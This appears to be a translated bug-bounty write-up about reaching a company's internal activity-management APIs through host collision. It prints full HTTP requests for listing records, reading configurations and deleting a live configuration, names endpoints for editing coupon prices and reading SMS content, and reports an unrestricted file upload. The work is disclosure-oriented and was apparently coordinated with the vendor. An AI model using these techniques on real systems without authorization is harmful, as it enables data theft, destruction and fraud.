0X01. Preface
The target of this test is a domestic SRC exclusive project, using host collision to access the intranet system interface, splicing the structure to obtain sensitive information, operating sensitive information, constructing the upload interface to upload arbitrary files, and harvesting a total of one high-risk and one medium-risk, the host collision principle and The tools have been introduced before, so I won’t say too much here. Masters, you can read the previous articles. Today’s one is a little more difficult than last time, but it’s okay.
0X02. Mining and utilization process
First look at a JS file, through which you can see that there are many interfaces.
You can see that there are many interfaces by directly searching the URL
Use the constructed url to access the system, use burp to capture packets to modify the host value, and put the following data packets into burp for replay (note: there is a high probability that 403 will be returned, and the desired data can be returned after sending it a few more times), you can see List information of some activities in the system, such as the time and name of the activity, but this is actually nothing, so in order to prove the harm, here is an attempt to delete some useless activity information (coordinated with the manufacturer, because they want to I prove that it is harmful, and I suggest that the masters carefully consider the operation of the data haha) Here I take the deletion of the /activity_admin/api/source/config/base/delete interface as an example;
POST /activity_admin/api/activities/ics HTTP/1.1
Host: xxx.com.cn
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Content-Type: application/json
Content-Length: 2
{}
Continue to find some interfaces to use, such as the interface /activity_admin/api/sms/tasks to view the content of SMS messages
There are also interfaces such as /activity_admin/api/source/config/base/condition, which can view the configuration of various applets in the system. You can see that there are still 51 pieces of data before the interface is deleted.
POST /activity_admin/api/source/config/base/condition HTTP/1.1
Host: xxx.com.cn
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/json
Content-Length: 27
{"pageNum":1,"pageSize":51}
Then use the delete interface /activity_admin/api/source/config/base/delete to delete the car page calculator, the system returns success, and the configuration is successfully deleted.
DELETE /activity_admin/api/source/config/base/delete HTTP/1.1
Host: xxx.com.cn
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/json
Content-Length: 70
{"sourceCode":"seriesCalc","operatorName":"songziwen","operatorId":-1}
、
This interface displays all store activities, the store name, and the name of the user who created the activity.
POST /activity_admin/api/activities/ebusiness/condition HTTP/1.1
Host: xxxx.com.cn
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/json
Content-Length: 28
{"pageNum":1,"pageSize":380}
Then there is a high-risk interface, which can modify the activity. For example, the price of the coupon can be changed to 0.1 yuan for 100,000 yuan, which is extremely harmful. If the system is still running, it will not be destroyed. Refer to the delete interface
/activity_admin/api/activities/ebusiness/update
/activity_admin/api/activities/pushNotice/condition
At this point, the information obtained and the information that can be manipulated have reached the high-risk level, so I didn’t look for it anymore, and then looked at the file upload interface, which was also randomly constructed here. I found that there is no whitelist restriction. According to experience, the internal Many systems do not have file upload restrictions. I have encountered at least 10 times, so the masters must try to construct the upload interface. Here is also a successful file upload vulnerability.
0X03. Summary
This excavation gave one high-risk and one medium-risk, with a total of 25,000 pieces of rewards. This digging is a little more tiring than before, but it’s okay. If the masters encounter it, they must construct more threatening interfaces and upgrade the hazard as much as possible. , but the operation of adding and deleting needs to communicate with the manufacturer first, or accidentally enter it haha.